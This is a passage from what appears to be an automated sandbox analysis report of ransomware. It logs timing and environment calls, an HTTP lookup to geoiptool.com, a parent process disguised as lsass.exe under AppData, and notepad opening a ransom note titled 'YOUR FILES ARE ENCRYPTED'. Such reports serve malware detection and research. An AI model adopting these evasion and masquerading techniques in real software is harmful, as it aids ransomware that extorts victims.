| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
4422 | |
| Get Time | type = Performance Ctr, time = 6018041669 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807215468 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807221364 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807226731 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807232016 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807237312 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807605846 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807615210 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807620524 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807626374 |
|
1 | |
| Get Time | type = Performance Ctr, time = 7807631701 |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = TEMP, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp |
|
2 | |
| Get Environment String | name = WINDIR, result_out = C:\Windows |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 39 bytes |
| Total Data Received | 380 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 158.69.67.193 |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | geoiptool.com |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 39 bytes |
| Data Received | 380 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = http, server_name = geoiptool.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://geoiptool.com |
|
1 | |
| Read Response | size = 1024, size_out = 1024 |
|
19 | |
| Read Response | size = 1024, size_out = 872 |
|
1 | |
| Read Response | size = 1024, size_out = 0 |
|
1 | |
| Close Session | - |
|
1 |
Process #49: notepad.exe
0
0
| Information | Value |
|---|---|
| ID | #49 |
| File Name | c:\windows\syswow64\notepad.exe |
| Command Line | "C:\Windows\System32\notepad.exe" C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\!!! YOUR FILES ARE ENCRYPTED !!!.TXT |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:02, Reason: Child Process |
| Unmonitor | End Time: 00:04:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:23 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x690 |
| Parent PID | 0x538 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
68C
0x
5BC
|
